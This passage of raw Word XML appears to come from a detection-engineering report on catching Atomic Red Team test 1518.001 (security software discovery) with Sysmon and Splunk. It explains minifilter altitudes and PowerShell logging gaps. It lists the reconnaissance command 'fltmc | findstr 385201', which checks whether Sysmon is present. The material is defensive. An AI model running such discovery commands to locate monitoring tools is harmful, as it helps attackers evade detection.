          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1371" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="543A1CEE" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Native EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5474C5CE" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>If run via a script or interactive PowerShell, wmic.exe might not show — or could be launched in a way that doesn’t trigger a new process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidTr="0081210C" w14:paraId="4AD99A4F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="76FF88F3" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>fltmc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1371" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4435BF4C" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>findstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> 385201</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5CF8AB89" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Native EXEs piped (Though can be found by its separate components, fltmc.exe, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>findstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>, and 385201 which is the default Sysmon filter altitude)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3682BF70" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="32A6ACFC" w14:textId="3F47084D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="23165A20">
          <v:rect id="_x0000_i1026" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="58BFD755" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">On filter altitude and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>minifilters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="52B4CC8B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7D17C337" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Minifilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> drivers are kernel-mode components that attach to the file system stack to monitor or modify file I/O. They're used for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="13A90334" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Antivirus and EDR solutions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="55EC9CDC" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>File encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="714A7BE3" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>File auditing and monitoring (like Sysmon)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="517F96BE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter altitude determines load order of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>minifilters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>. Think of it like layers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="26C6EACA" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Higher altitude = closer to user-mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="382A1336" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Lower altitude = closer to the disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="412FD190" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This matters because it controls which filters see or affect I/O first. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="62875E12" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A filter with altitude 385201 sees file operations after a filter with altitude 409800 but before one at 320000.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7E30D3CB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>385201 allows Sysmon to observe file activity like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="323A0B3B" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>File creation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="77CDB344" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>File writes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="296339EE" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>File deletions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5EB22D76" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7486E513" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>But it does this after security tools like antivirus/EDR drivers (which usually sit at higher altitudes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="760F089A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="39CA0225" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This positioning is intentional:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="15C10535" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Sysmon monitors activity but doesn’t block or interfere.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="28F18BD6" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>It’s placed below security enforcement filters to avoid conflicts and ensure integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="558E5274" w14:textId="4EC99C03">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2772FF60">
          <v:rect id="_x0000_i1025" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4FFE1171" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00B31831" w:rsidRDefault="0081210C" w14:paraId="60F00C11" w14:textId="32D69D40">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Without full </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> event logging some of these commands as they are run in the executable are not detectable. To get full PowerShell command logs into Splunk we would need to configure PowerShell logging and forward those events through the forwarder. This would provide more complete coverage and detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="740BD737" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00B31831" w:rsidRDefault="0081210C" w14:paraId="054C6088" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">For now, only with Sysmon we can detect most of commands executed in the ART 1518.001 test so we could use this to set up an alerting system, though it would return some false positives in the way it is configured. Part of the query above involves understanding what automated and non-malicious processes may be running on your machines as well. For example: </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restricted -Command $Res = 0 [UInt64]$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>MinDiskSpaceThreshold</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 20 * 1024 * 1024 * 1024 try { $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Win32_OperatingSystem).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDriveLetter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>[0] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDriveSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
